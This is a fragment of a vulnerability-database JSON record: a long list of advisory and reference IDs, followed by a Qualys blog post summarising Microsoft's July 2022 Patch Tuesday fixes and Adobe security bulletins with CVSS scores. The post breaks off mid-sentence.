"THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:84E8993BD84BB1AAEE4273958FF69EDF", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A8A7A761CD72E2732BD9E3C75C4A2ACC", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:B8EE84454BCC4614F524D8A4901907C3", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E44D0A1C3C7C76586EBC905270FFAC34", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EA8274414AC42B3EF48CA27D45659736", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FF8B5ACCCE8A1CE6B8A830B1D3E9E316", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1", "USN-5203-1", "USN-5222-1", "USN-5568-1", "USN-5581-1", "USN-5663-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-44832", "UB:CVE-2021-45046", "UB:CVE-2021-45105", "UB:CVE-2022-2294", "UB:CVE-2022-2295", "UB:CVE-2022-2624", "UB:CVE-2022-3075", "UB:CVE-2022-38476", "UB:CVE-2022-38477", "UB:CVE-2022-38478"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348", "VERACODE:33382", "VERACODE:33476", "VERACODE:36371", "VERACODE:36373", "VERACODE:36680", "VERACODE:36929", "VERACODE:36930", "VERACODE:36931", "VERACODE:37091"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-21-1541", "ZDI-22-1069", "ZDI-22-1075", "ZDI-22-1595", "ZDI-22-1624", "ZDI-22-1625", "ZDI-22-1626", "ZDI-22-1627", "ZDI-22-1628", "ZDI-22-1629", "ZDI-22-1630", "ZDI-22-1631", "ZDI-22-1632", "ZDI-22-1633", "ZDI-22-1634", "ZDI-22-1635", "ZDI-22-1636", "ZDI-22-1637", "ZDI-22-1638", "ZDI-22-1639", "ZDI-22-1640", "ZDI-22-1641", "ZDI-22-1642", "ZDI-22-1643", "ZDI-22-1644", "ZDI-22-1645", "ZDI-22-1646", "ZDI-22-1647", "ZDI-22-1648", "ZDI-22-1649", "ZDI-22-1650", "ZDI-22-1651", "ZDI-22-1652", "ZDI-22-1653", "ZDI-22-1654", "ZDI-22-969", "ZDI-22-970", "ZDI-22-971", "ZDI-22-972", "ZDI-22-973", "ZDI-22-974", "ZDI-22-975", "ZDI-22-976", "ZDI-22-977", "ZDI-22-978"]}, {"type": "zdt", "idList": ["1337DAY-ID-27607", "1337DAY-ID-27617", "1337DAY-ID-27662", "1337DAY-ID-28811", "1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-37126", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37779", "1337DAY-ID-37889"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "vulnersScore": 0.8}, "_state": {"dependencies": 1669810568, "score": 1669811242}, "_internal": {"score_hash": "11bb8a5a36cc4e2c017f70d0ab42d4d1"}}

{"qualysblog": [{"lastseen": "2022-07-15T23:58:32", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates as well.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-JULY-IMPACT-1.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2022/06/image-4.png) [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. (Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. If you do not have either of these versions of RDP installed on Windows 7 SP1 or Window Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-JULY-ADOBE.png)\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation could lead to arbitrary code execution in the context of current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities; 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>), and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>) _**vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code 